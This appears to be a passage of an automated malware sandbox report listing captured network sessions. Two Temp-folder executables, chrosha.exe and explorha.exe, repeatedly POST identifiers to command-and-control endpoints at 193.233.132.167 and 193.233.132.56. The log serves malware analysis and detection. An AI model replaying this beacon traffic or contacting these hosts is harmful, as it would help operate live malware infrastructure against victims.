                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      565 | 192.168.2.5 | 50410 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:34.970312119 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:35.213387966 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      566 | 192.168.2.5 | 50411 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:34.994910002 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:35.246093035 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      567 | 192.168.2.5 | 50412 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:35.466778040 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:35.717772007 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      568 | 192.168.2.5 | 50413 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:35.495186090 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:35.745094061 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
569 | 192.168.2.5 | 50414 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:36.063841105 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:36.302973032 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
570 | 192.168.2.5 | 50415 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:36.102509975 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:36.349877119 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
571 | 192.168.2.5 | 50416 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:36.550277948 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:32:36.801739931 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
572 | 192.168.2.5 | 50417 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:36.600192070 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:36.851176023 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
573 | 192.168.2.5 | 50418 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:37.167632103 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:37.416115046 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
574 | 192.168.2.5 | 50419 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:37.209405899 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:37.453845978 CEST  219                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
575         192.168.2.5  50420        193.233.132.167  80                8024  C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:32:37.664644003 CEST  309                OUT        POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:32:37.912349939 CEST  196                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
576         192.168.2.5  50421        193.233.132.56   80                4484  C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:32:37.697608948 CEST  312                OUT        POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:37.942133904 CEST  196                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
577         192.168.2.5  50422        193.233.132.167  80                8024  C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:32:38.277050972 CEST  155                OUT        POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:38.528007030 CEST  197                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
578         192.168.2.5  50423        193.233.132.56   80                4484  C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:32:38.307742119 CEST  158                OUT        POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:38.556583881 CEST  219                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
579         192.168.2.5  50424        193.233.132.167  80                8024  C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:32:38.775918007 CEST  309                OUT        POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:32:39.024724007 CEST  196                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
580         192.168.2.5  50425        193.233.132.56   80                4484  C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:32:38.809318066 CEST  312                OUT        POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:39.062760115 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
581 | 192.168.2.5 | 50426 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:39.379060030 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:39.622348070 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:39 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
582 | 192.168.2.5 | 50427 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:39.435887098 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:39.687964916 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:39 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
583 | 192.168.2.5 | 50428 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:39.881346941 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
